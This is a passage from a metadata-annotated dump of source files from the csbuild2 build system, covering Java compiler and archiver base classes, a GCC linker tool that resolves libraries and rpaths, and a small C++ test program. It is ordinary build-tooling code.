os.F_OK)}\n\n\t\tallDeps.update(deps)\n\t\tvalues.extend([CheckCompilabilityForFile(buildProject, checker, dep, valueMemo, allDeps) for dep in deps])\n\n\t\tvalue = checker.CondenseRecompileChecks(values)\n\t\tvalueMemo[inputFile] = value\n\t\treturn value\n\n@TypeChecked(buildProject=project.Project, checker=CompileChecker, inputFiles=ordered_set.OrderedSet)\ndef ShouldRecompile(buildProject, checker, inputFiles):\n\t\"\"\"\n\tDetermine whether or not a file or list of files should be recompiled.\n\n\t:param buildProject: Project being filtered\n\t:type buildProject: project.Project\n\t:param checker: Compile checker to check with\n\t:type checker: CompileChecker\n\t:param inputFiles: files to check\n\t:type inputFiles: ordered_set.OrderedSet[input_file.InputFile]\n\t:return: True if the list of inputs should be reprocessed, false otherwise\n\t:rtype: bool\n\t\"\"\"\n\twith perf_timer.PerfTimer(\"Filter for recompile\"):\n\t\tif shared_globals.runMode == shared_globals.RunMode.GenerateSolution:\n\t\t\t# All files should be \"compiled\" when generating a solution.\n\t\t\treturn True\n\t\tlog.Info(\"Checking if we should compile {}\", inputFiles)\n\t\tbaseline = checker.GetRecompileBaseline(buildProject, inputFiles)\n\t\tif baseline is None:\n\t\t\treturn True\n\t\tvalues = [CheckCompilabilityForFile(buildProject, checker, os.path.abspath(PlatformString(f.filename)), checker.memo, set()) for f in inputFiles]\n\n\t\twith perf_timer.PerfTimer(\"Cross-thread Final Resolution\"):\n\t\t\treturn checker.ShouldRecompile(checker.CondenseRecompileChecks(values), baseline)\n" }, { "alpha_fraction": 0.6181347370147705, "alphanum_fraction": 0.6189982891082764, "avg_line_length": 32.08571243286133, "blob_id": "9f74e5d9bceef45b7d56e6992b8d45e9cee40400", "content_id": "83cf3217534c0f666e4f0cb9e4660dcfd7641987", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5790, "license_type": "no_license", "max_line_length": 124, "num_lines": 175, "path": "/csbuild/tools/java_archivers/java_archiver_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: java_archiver_base\n\t:synopsis: Base class for Java archivers.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport csbuild\n\nfrom abc import ABCMeta, abstractmethod\n\nfrom ..common.java_tool_base import JavaToolBase\n\nfrom ... import commands, log\nfrom ..._utils.decorators import MetaClass\n\ndef _ignore(_):\n\tpass\n\n@MetaClass(ABCMeta)\nclass JavaArchiverBase(JavaToolBase):\n\t\"\"\"\n\tBase class for Java archivers.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tinputGroups = { \".class\" }\n\toutputFiles = { \".jar\" }\n\n\t################################################################################\n\t### Initialization\n\t################################################################################\n\n\tdef __init__(self, projectSettings):\n\t\tself._entryPointClass = projectSettings.get(\"javaEntryPointClass\", \"\")\n\n\t\tJavaToolBase.__init__(self, projectSettings)\n\n\n\t################################################################################\n\t### Static makefile methods\n\t################################################################################\n\n\t@staticmethod\n\tdef SetJavaEntryPointClass(fullClassName):\n\t\t\"\"\"\n\t\tSet the entry point class for a Java application.\n\n\t\t:param fullClassName: Entry point class in the form: <package>.<class_name>\n\t\t:type fullClassName: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"javaEntryPointClass\", fullClassName)\n\n\n\t################################################################################\n\t### Public API\n\t################################################################################\n\n\tdef GetJavaEntryPointClass(self):\n\t\t\"\"\"\n\t\tGet the entry point class for the Java application.\n\n\t\t:return: Java application entry point class.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn self._entryPointClass\n\n\n\n\t################################################################################\n\t### Methods that may be implemented by subclasses as needed\n\t################################################################################\n\n\tdef _getEnv(self, project):\n\t\t_ignore(project)\n\t\treturn None\n\n\n\t################################################################################\n\t### Abstract methods that need to be implemented by subclasses\n\t################################################################################\n\n\t@abstractmethod\n\tdef _getOutputFiles(self, project):\n\t\t\"\"\"\n\t\tGet the set of output files that will be created from archiving a project.\n\n\t\t:param project: Project being linked.\n\t\t:type project: project.Project\n\n\t\t:return: Tuple of files that will be produced from linking.\n\t\t:rtype: tuple[str]\n\t\t\"\"\"\n\t\treturn (\"\", )\n\n\t@abstractmethod\n\tdef _getCommand(self, project, inputFiles, classRootPath):\n\t\t\"\"\"\n\t\tGet the command to link the provided set of files for the provided project.\n\n\t\t:param project: Project to link.\n\t\t:type project: project.Project\n\n\t\t:param inputFiles: Files being linked.\n\t\t:type inputFiles: input_file.InputFile\n\n\t\t:param classRootPath: Root path for the compiled class files.\n\t\t:type classRootPath: str\n\n\t\t:return: Command to execute, broken into a list, as would be provided to subprocess functions.\n\t\t:rtype: list\n\t\t\"\"\"\n\t\treturn []\n\n\n\t################################################################################\n\t### Base class methods containing logic shared by all subclasses\n\t################################################################################\n\n\tdef RunGroup(self, inputProject, inputFiles):\n\t\t\"\"\"\n\t\tExecute a group build step. Note that this method is run massively in parallel with other build steps.\n\t\tIt is NOT thread-safe in ANY way. If you need to change shared state within this method, you MUST use a\n\t\tmutex.\n\n\t\t:param inputProject: Project being built.\n\t\t:type inputProject: csbuild._build.project.Project\n\n\t\t:param inputFiles: List of files to build.\n\t\t:type inputFiles: list[input_file.InputFile]\n\n\t\t:return: Tuple of files created by the tool - all files must have an extension in the outputFiles list.\n\t\t:rtype: tuple[str]\n\n\t\t:raises BuildFailureException: Build process exited with an error.\n\t\t\"\"\"\n\t\tlog.Linker(\n\t\t\t\"Archiving {} ({}-{}-{}).jar...\",\n\t\t\tinputProject.outputName,\n\t\t\tinputProject.toolchainName,\n\t\t\tinputProject.architectureName,\n\t\t\tinputProject.targetName\n\t\t)\n\n\t\tclassRootPath = os.path.join(inputProject.intermediateDir, self._javaClassRootDirName)\n\n\t\treturncode, _, _ = commands.Run(self._getCommand(inputProject, inputFiles, classRootPath), env=self._getEnv(inputProject))\n\t\tif returncode != 0:\n\t\t\traise csbuild.BuildFailureException(inputProject, inputFiles)\n\n\t\treturn self._getOutputFiles(inputProject)\n" }, { "alpha_fraction": 0.6505626440048218, "alphanum_fraction": 0.6529879570007324, "avg_line_length": 29.407079696655273, "blob_id": "471d888a62df52cee2765967822312b5504a932b", "content_id": "7f1eeef79c9e5c7f4187544cd1ece0d336fa0999", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10308, "license_type": "no_license", "max_line_length": 119, "num_lines": 339, "path": "/csbuild/tools/linkers/gcc_linker.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: gcc_linker\n\t:synopsis: gcc linker tool for C++, d, asm, etc\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport platform\nimport re\n\nimport csbuild\n\nfrom .linker_base import LinkerBase\nfrom ... import commands, log\nfrom ..._utils import ordered_set, response_file, shared_globals\n\ndef _ignore(_):\n\tpass\n\nclass GccLinker(LinkerBase):\n\t\"\"\"\n\tGCC linker tool for c++, d, asm, etc\n\t\"\"\"\n\tsupportedArchitectures = {\"x86\", \"x64\", \"arm\", \"arm64\"}\n\n\tinputGroups = {\".o\"}\n\toutputFiles = {\"\", \".a\", \".so\"}\n\tcrossProjectDependencies = {\".a\", \".so\"}\n\n\t_failRegex = re.compile(R\"ld: cannot find -l(.*)\")\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef _getOutputFiles(self, project):\n\t\treturn tuple({ os.path.join(project.outputDir, project.outputName + self._getOutputExtension(project.projectType)) })\n\n\tdef _getCommand(self, project, inputFiles):\n\t\tif project.projectType == csbuild.ProjectType.StaticLibrary:\n\t\t\tcmdExe = self._getArchiverName()\n\t\t\tcmd = [\"rcs\"] \\\n\t\t\t\t+ self._getOutputFileArgs(project) \\\n\t\t\t\t+ self._getInputFileArgs(inputFiles)\n\t\t\tuseResponseFile = self._useResponseFileWithArchiver()\n\t\telse:\n\t\t\tcmdExe = self._getBinaryLinkerName()\n\t\t\tcmd = self._getDefaultArgs(project) \\\n\t\t\t\t+ self._getCustomArgs() \\\n\t\t\t\t+ self._getArchitectureArgs(project) \\\n\t\t\t\t+ self._getSystemArgs(project) \\\n\t\t\t\t+ self._getOutputFileArgs(project) \\\n\t\t\t\t+ self._getInputFileArgs(inputFiles) \\\n\t\t\t\t+ self._getLibraryPathArgs(project) \\\n\t\t\t\t+ self._getRpathArgs(project) \\\n\t\t\t\t+ self._getStartGroupArgs() \\\n\t\t\t\t+ self._getLibraryArgs() \\\n\t\t\t\t+ self._getEndGroupArgs()\n\t\t\tuseResponseFile = self._useResponseFileWithArchiver()\n\n\t\tif useResponseFile:\n\t\t\tresponseFile = response_file.ResponseFile(project, \"linker-{}\".format(project.outputName), cmd)\n\n\t\t\tif shared_globals.showCommands:\n\t\t\t\tlog.Command(\"ResponseFile: {}\\n\\t{}\".format(responseFile.filePath, responseFile.AsString()))\n\n\t\t\tcmd = [cmdExe, \"@{}\".format(responseFile.filePath)]\n\n\t\telse:\n\t\t\tcmd = [cmdExe] + cmd\n\t\t\tcmd = [arg for arg in cmd if arg]\n\n\t\treturn cmd\n\n\tdef _findLibraries(self, project, libs):\n\t\tret = {}\n\n\t\tshortLibs = ordered_set.OrderedSet(libs)\n\t\tlongLibs = []\n\n\t\tfor lib in libs:\n\t\t\tif os.access(lib, os.F_OK) and not os.path.isdir(lib):\n\t\t\t\tabspath = os.path.abspath(lib)\n\t\t\t\tret[lib] = abspath\n\t\t\t\tshortLibs.remove(lib)\n\n\t\t\telif os.path.splitext(lib)[1]:\n\t\t\t\tshortLibs.remove(lib)\n\t\t\t\tlongLibs.append(lib)\n\n\t\tif platform.system() == \"Windows\":\n\t\t\tnullOut = os.path.join(project.csbuildDir, \"null\")\n\t\telse:\n\t\t\tnullOut = \"/dev/null\"\n\n\t\tif shortLibs:\n\t\t\t# In most cases this should be finished in exactly two attempts.\n\t\t\t# However, in some rare cases, ld will get to a successful lib after hitting a failure and just give up.\n\t\t\t# -lpthread is one such case, and in that case we have to do this more than twice.\n\t\t\t# However, the vast majority of cases should require only two calls (and only one if everything is -lfoo format)\n\t\t\t# and the vast majority of the cases that require a third pass will not require a fourth... but, everything\n\t\t\t# is possible! Still better than doing a pass per file like we used to.\n\t\t\twhile True:\n\t\t\t\tcmd = [self._getLdName(), \"--verbose\", \"-M\", \"-o\", nullOut] + \\\n\t\t\t\t\t [\"-L\"+path for path in self._getLibrarySearchDirectories()] + \\\n\t\t\t\t\t [\"-l\"+lib for lib in shortLibs] + \\\n\t\t\t\t\t [\"-l:\"+lib for lib in longLibs]\n\t\t\t\treturncode, out, err = commands.Run(cmd, None, None)\n\t\t\t\tif returncode != 0:\n\t\t\t\t\tlines = err.splitlines()\n\t\t\t\t\tmoved = False\n\t\t\t\t\tfor line in lines:\n\t\t\t\t\t\tmatch = GccLinker._failRegex.match(line)\n\t\t\t\t\t\tif match:\n\t\t\t\t\t\t\tlib = match.group(1)\n\t\t\t\t\t\t\tif lib not in shortLibs:\n\t\t\t\t\t\t\t\tfor errorLine in lines:\n\t\t\t\t\t\t\t\t\tlog.Error(errorLine)\n\t\t\t\t\t\t\t\treturn None\n\t\t\t\t\t\t\tshortLibs.remove(lib)\n\t\t\t\t\t\t\tlongLibs.append(lib)\n\t\t\t\t\t\t\tmoved = True\n\n\t\t\t\t\tif not moved:\n\t\t\t\t\t\tfor line in lines:\n\t\t\t\t\t\t\tlog.Error(line)\n\t\t\t\t\t\treturn None\n\n\t\t\t\t\tcontinue\n\t\t\t\tbreak\n\n\t\t\tmatches = []\n\n\t\t\ttry:\n\t\t\t\t# All bfd linkers should have the link maps showing where libraries load from. Most linkers will be\n\t\t\t\t# bfd-based, so first assume that is the output we have and try to parse it.\n\t\t\t\tloading = False\n\t\t\t\tinGroup = False\n\t\t\t\tfor line in out.splitlines():\n\t\t\t\t\tif line.startswith(\"LOAD\"):\n\t\t\t\t\t\tif inGroup:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tloading = True\n\t\t\t\t\t\tmatches.append(line[5:])\n\t\t\t\t\telif line == \"START GROUP\":\n\t\t\t\t\t\tinGroup = True\n\t\t\t\t\telif line == \"END GROUP\":\n\t\t\t\t\t\tinGroup = False\n\t\t\t\t\telif loading:\n\t\t\t\t\t\tbreak\n\n\t\t\t\tassert len(matches) == len(shortLibs) + len(longLibs)\n\t\t\t\tassert len(matches) + len(ret) == len(libs)\n\n\t\t\texcept AssertionError:\n\t\t\t\t# Fallback to doing the traditional regex check when the link map check failes.\n\t\t\t\t# All bfd- and gold-compatible linkers should have this.\n\t\t\t\tsucceedRegex = re.compile(\"(?:.*ld(?:.exe)?): Attempt to open (.*) succeeded\")\n\t\t\t\tfor line in err.splitlines():\n\t\t\t\t\tmatch = succeedRegex.match(line)\n\t\t\t\t\tif match:\n\t\t\t\t\t\tmatches.append(match.group(1))\n\n\t\t\t\tassert len(matches) == len(shortLibs) + len(longLibs)\n\t\t\t\tassert len(matches) + len(ret) == len(libs)\n\n\t\t\tfor i, lib in enumerate(shortLibs):\n\t\t\t\tret[lib] = matches[i]\n\t\t\tfor i, lib in enumerate(longLibs):\n\t\t\t\tret[lib] = matches[i+len(shortLibs)]\n\t\t\tfor lib in libs:\n\t\t\t\tlog.Info(\"Found library '{}' at {}\", lib, ret[lib])\n\n\t\treturn ret\n\n\tdef _getOutputExtension(self, projectType):\n\t\toutputExt = {\n\t\t\tcsbuild.ProjectType.Application: \"\",\n\t\t\tcsbuild.ProjectType.SharedLibrary: \".so\",\n\t\t\tcsbuild.ProjectType.StaticLibrary: \".a\",\n\t\t}.get(projectType, None)\n\n\t\treturn outputExt\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getLdName(self):\n\t\treturn \"ld\"\n\n\tdef _getBinaryLinkerName(self):\n\t\treturn \"g++\"\n\n\tdef _getArchiverName(self):\n\t\treturn \"ar\"\n\n\tdef _useResponseFileWithLinker(self):\n\t\treturn True\n\n\tdef _useResponseFileWithArchiver(self):\n\t\treturn True\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = []\n\t\tif project.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\targs.extend([\n\t\t\t\t\"-shared\",\n\t\t\t\t\"-fPIC\",\n\t\t\t])\n\t\treturn args\n\n\tdef _getCustomArgs(self):\n\t\treturn self._linkerFlags\n\n\tdef _getOutputFileArgs(self, project):\n\t\toutFile = self._getOutputFiles(project)[0]\n\t\tif project.projectType == csbuild.ProjectType.StaticLibrary:\n\t\t\treturn [outFile]\n\t\treturn [\"-o\", outFile]\n\n\tdef _getInputFileArgs(self, inputFiles):\n\t\treturn [f.filename for f in inputFiles]\n\n\tdef _getLibraryPathArgs(self, project):\n\t\t_ignore(project)\n\t\targs = [\"-L{}\".format(os.path.dirname(libFile)) for libFile in self._actualLibraryLocations.values()]\n\t\treturn args\n\n\tdef _rpathStartsWithVariable(self, rpath):\n\t\treturn rpath.startswith(\"$\")\n\n\tdef _getRpathOriginVariable(self):\n\t\treturn \"$ORIGIN\"\n\n\tdef _resolveRpath(self, outDir, rpath):\n\t\tif not rpath or rpath.startswith(\"/usr/lib\") or rpath.startswith(\"/usr/local/lib\"):\n\t\t\treturn None\n\n\t\trpath = os.path.normpath(rpath)\n\n\t\t# Do not change any rpath that begins with a variable.\n\t\tif not self._rpathStartsWithVariable(rpath):\n\t\t\tabsPath = os.path.abspath(rpath)\n\n\t\t\t# If the RPATH is in the output directory, we can ignore it.\n\t\t\tif absPath == outDir:\n\t\t\t\treturn None\n\n\t\t\trelPath = os.path.relpath(absPath, outDir)\n\n\t\t\t# We join the path with the origin variable if it can be formed relative to the output directory.\n\t\t\tif absPath != relPath:\n\t\t\t\torigin = self._getRpathOriginVariable()\n\t\t\t\trpath = os.path.join(origin, relPath)\n\n\t\treturn rpath\n\n\tdef _getRpathArgs(self, project):\n\t\tif project.projectType != csbuild.ProjectType.Application:\n\t\t\treturn []\n\n\t\targs = [\n\t\t\t\"-Wl,--enable-new-dtags\",\n\t\t\t\"-Wl,-R,{}\".format(self._getRpathOriginVariable()),\n\t\t]\n\n\t\trpaths = set()\n\t\toutDir = os.path.dirname(self._getOutputFiles(project)[0])\n\n\t\tif project.autoResolveRpaths:\n\t\t\t# Add RPATH arguments for each linked library path.\n\t\t\tfor lib in self._actualLibraryLocations.values():\n\t\t\t\tlibDir = os.path.dirname(lib)\n\t\t\t\trpath = self._resolveRpath(outDir, libDir)\n\n\t\t\t\tif rpath:\n\t\t\t\t\trpaths.add(rpath)\n\n\t\t# Add RPATH arguments for each path specified in the makefile.\n\t\tfor path in self._rpathDirectories:\n\t\t\tpath = self._resolveRpath(outDir, path)\n\n\t\t\tif path:\n\t\t\t\trpaths.add(path)\n\n\t\t# Add each RPATH to the argument list.\n\t\tfor path in sorted(rpaths):\n\t\t\targs.append(\"-Wl,-R,{}\".format(path))\n\n\t\treturn args\n\n\tdef _getLibraryArgs(self):\n\t\treturn [\"-l:{}\".format(os.path.basename(lib)) for lib in self._actualLibraryLocations.values()]\n\n\tdef _getStartGroupArgs(self):\n\t\treturn [\"-Wl,--no-as-needed\", \"-Wl,--start-group\"]\n\n\tdef _getEndGroupArgs(self):\n\t\treturn [\"-Wl,--end-group\"]\n\n\tdef _getArchitectureArgs(self, project):\n\t\targs = {\n\t\t\t\"x86\": [\"-m32\"],\n\t\t\t\"x64\": [\"-m64\"],\n\t\t}.get(project.architectureName, [])\n\t\treturn args\n\n\tdef _getSystemArgs(self, project):\n\t\t_ignore(project)\n\t\treturn []\n\n\tdef _getLibrarySearchDirectories(self):\n\t\treturn self._libraryDirectories\n" }, { "alpha_fraction": 0.6309846639633179, "alphanum_fraction": 0.6317374110221863, "avg_line_length": 31.71921157836914, "blob_id": "89077a1d6bd20d6ff1843bb8a50cd57598bd1a68", "content_id": "ebfe05e3ef5cea3063b1136ac224764bad51fc67", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6642, "license_type": "no_license", "max_line_length": 124, "num_lines": 203, "path": "/csbuild/tools/java_compilers/java_compiler_base.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: java_compiler_base\n\t:synopsis: Base class for Java compilers.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\nimport threading\n\nfrom abc import ABCMeta, abstractmethod\n\nfrom ..common.java_tool_base import JavaToolBase\n\nfrom ... import commands, log\nfrom ..._utils import ordered_set\nfrom ..._utils.decorators import MetaClass\n\ndef _ignore(_):\n\tpass\n\n@MetaClass(ABCMeta)\nclass JavaCompilerBase(JavaToolBase):\n\t\"\"\"\n\tBase class for Java compilers.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tinputGroups = { \".java\" }\n\toutputFiles = { \".class\" }\n\n\t_lock = threading.Lock()\n\n\t################################################################################\n\t### Initialization\n\t################################################################################\n\n\tdef __init__(self, projectSettings):\n\t\tself._srcPaths = projectSettings.get(\"javaSrcPaths\", ordered_set.OrderedSet())\n\t\tself._classPaths = projectSettings.get(\"javaClassPaths\", ordered_set.OrderedSet())\n\n\t\tJavaToolBase.__init__(self, projectSettings)\n\n\n\t################################################################################\n\t### Static makefile methods\n\t################################################################################\n\n\t@staticmethod\n\tdef AddJavaSourcePaths(*dirs):\n\t\t\"\"\"\n\t\tAdd directories in which to search for Java source files.\n\n\t\t:param dirs: List of directories.\n\t\t:type dirs: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UnionSet(\"javaSrcPaths\", [os.path.abspath(directory) for directory in dirs])\n\n\t@staticmethod\n\tdef AddJavaClassPaths(*dirs):\n\t\t\"\"\"\n\t\tAdd directories in which to search for compiled Java classes.\n\n\t\t:param dirs: List of directories.\n\t\t:type dirs: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UnionSet(\"javaClassPaths\", [os.path.abspath(directory) for directory in dirs])\n\n\n\t################################################################################\n\t### Public API\n\t################################################################################\n\n\tdef GetJavaSourcePaths(self):\n\t\t\"\"\"\n\t\tGet the list of Java source file directories.\n\n\t\t:return: Class directories\n\t\t:rtype: ordered_set.OrderedSet[str]\n\t\t\"\"\"\n\t\treturn self._srcPaths\n\n\tdef GetJavaClassPaths(self):\n\t\t\"\"\"\n\t\tGet the list of Java class directories.\n\n\t\t:return: Class directories\n\t\t:rtype: ordered_set.OrderedSet[str]\n\t\t\"\"\"\n\t\treturn self._classPaths\n\n\n\t################################################################################\n\t### Methods that may be implemented by subclasses as needed\n\t################################################################################\n\n\tdef _getEnv(self, project):\n\t\t_ignore(project)\n\t\treturn None\n\n\n\t################################################################################\n\t### Abstract methods that need to be implemented by subclasses\n\t################################################################################\n\n\t@abstractmethod\n\tdef _getOutputFiles(self, project, inputFiles, classRootPath):\n\t\t\"\"\"\n\t\tGet the set of output files that will be created from compiling a project.\n\n\t\t:param project: Project being compiled.\n\t\t:type project: project.Project\n\n\t\t:param inputFiles: Files being compiled.\n\t\t:type inputFiles: input_file.InputFile\n\n\t\t:param classRootPath: Root path for the compiled class files.\n\t\t:type classRootPath: str\n\n\t\t:return: Tuple of files that will be produced from compiling.\n\t\t:rtype: tuple[str]\n\t\t\"\"\"\n\t\treturn (\"\", )\n\n\t@abstractmethod\n\tdef _getCommand(self, project, inputFiles, classRootPath):\n\t\t\"\"\"\n\t\tGet the command to compile the provided set of files for the provided project\n\n\t\t:param project: Project being compiled.\n\t\t:type project: project.Project\n\n\t\t:param inputFiles: Files being compiled.\n\t\t:type inputFiles: input_file.InputFile\n\n\t\t:param classRootPath: Root path for the compiled class files.\n\t\t:type classRootPath: str\n\n\t\t:return: Command to execute, broken into a list, as would be provided to subprocess functions.\n\t\t:rtype: list\n\t\t\"\"\"\n\t\treturn []\n\n\n\t################################################################################\n\t### Base class methods containing logic shared by all subclasses\n\t################################################################################\n\n\tdef RunGroup(self, inputProject, inputFiles):\n\t\tlog.Build(\n\t\t\t\"Compiling Java files for {} ({}-{}-{}): [{}]\",\n\t\t\tinputProject.outputName,\n\t\t\tinputProject.toolchainName,\n\t\t\tinputProject.architectureName,\n\t\t\tinputProject.targetName,\n\t\t\t\", \".join(\n\t\t\t\tsorted([f.filename for f in inputFiles])\n\t\t\t)\n\t\t)\n\n\t\t# Create the class root intermediate directory.\n\t\tclassRootPath = os.path.join(inputProject.intermediateDir, self._javaClassRootDirName)\n\t\tif not os.access(classRootPath, os.F_OK):\n\t\t\t# Put a lock on the directory just in case something else happens to be trying to create it at the same time.\n\t\t\twith JavaCompilerBase._lock: # pylint:disable=not-context-manager\n\t\t\t\tif not os.access(classRootPath, os.F_OK):\n\t\t\t\t\tos.makedirs(classRootPath)\n\n\t\treturncode, _, _ = commands.Run(self._getCommand(inputProject, inputFiles, classRootPath), env=self._getEnv(inputProject))\n\t\tif returncode != 0:\n\t\t\traise csbuild.BuildFailureException(inputProject, inputFiles)\n\n\t\toutputFiles = self._getOutputFiles(inputProject, inputFiles, classRootPath)\n\n\t\t# If the project generated no class files, flag that as an error.\n\t\tif not outputFiles:\n\t\t\tlog.Error(\"Project {} generated no class files\".format(inputProject.outputName))\n\n\t\treturn outputFiles\n" }, { "alpha_fraction": 0.6470588445663452, "alphanum_fraction": 0.6554622054100037, "avg_line_length": 12.222222328186035, "blob_id": "b62281307a28f70f6faa1ee9df672275c7a504e9", "content_id": "38ec9686ebea4a8c008a1a1a2981dddc49ec2a8a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 119, "license_type": "no_license", "max_line_length": 35, "num_lines": 9, "path": "/functional_tests/cpp_rpath_test/hello_world/main.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "#include \"header.hpp\"\n#include \"../libhello/libhello.hpp\"\n\nint main()\n{\n\thello_world();\n\tgoodbye_world();\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6890106201171875, "alphanum_fraction": 0.6902996897697449, "avg_line_length": 35.94047546386719, "blob_id": "f392963e8f8bbec55b5a207dea689c82901b148c", "content_id": "2afbd8ded0630b748561dc3c882f8727a0ed903b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3103, "license_type": "no_license", "max_line_length": 135, "num_lines": 84, "path": "/csbuild/tools/linkers/msvc_uwp_linker.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: msvc_uwp_linker\n\t:synopsis: MSVC linker tool for C++, d, asm, etc, to build apps for the Universal Windows Platform\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\nimport csbuild\n\nfrom .msvc_linker import MsvcLinker\n\nclass MsvcUwpLinker(MsvcLinker):\n\t\"\"\"\n\tMSVC linker tool implementation for building apps for the Universal Windows Platform\n\t\"\"\"\n\toutputFiles = {\".exe\", \".lib\", \".dll\", 